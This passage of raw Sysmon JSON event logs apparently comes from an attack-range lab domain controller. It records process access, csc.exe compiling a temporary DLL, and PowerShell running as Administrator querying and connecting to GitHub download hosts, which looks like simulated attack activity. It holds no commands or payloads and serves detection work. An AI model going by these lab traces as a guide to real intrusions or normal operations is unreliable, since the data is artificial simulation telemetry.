05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001005090700}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001005090700}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:21.436\r\nProcessGuid: {A837DB8D-0315-5F25-0000-001077050700}\r\nProcessId: 3652\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.dll\r\nCreationUtcTime: 2020-08-01 05:52:21.358","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:21.436","ProcessGuid":"{A837DB8D-0315-5F25-0000-001077050700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.dll","CreationUtcTime":"2020-08-01 05:52:21.358","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4657,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.680\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54937\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 199.232.64.133\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.680","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54937","DestinationIsIpv6":"false","DestinationIp":"199.232.64.133","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4658,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:20.318\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54938\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.4\r\nDestinationHostname: lb-140-82-113-4-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:20.318","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54938","DestinationIsIpv6":"false","DestinationIp":"140.82.113.4","DestinationHostname":"lb-140-82-113-4-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4659,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.665\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: raw.githubusercontent.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 github.map.fastly.net;::ffff:199.232.64.133;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.665","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"raw.githubusercontent.com","QueryStatus":"0","QueryResults":"type:  5 github.map.fastly.net;::ffff:199.232.64.133;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4660,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:20.307\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.4;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:20.307","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.4;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4661,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:20.470\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: codeload.github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.112.10;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:20.470","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"codeload.github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.112.10;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4662,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:20.482\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54939\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.112.10\r\nDestinationHostname: lb-140-82-112-10-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:20.482","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54939","DestinationIsIpv6":"false","DestinationIp":"140.82.112.10","DestinationHostname":"lb-140-82-112-10-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4663,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.674\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54940\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 184.84.68.43\r\nDestinationHostname: a184-84-68-43.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.674","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54940","DestinationIsIpv6":"false","DestinationIp":"184.84.68.43","DestinationHostname":"a184-84-68-43.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4664,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.858\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54941\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: 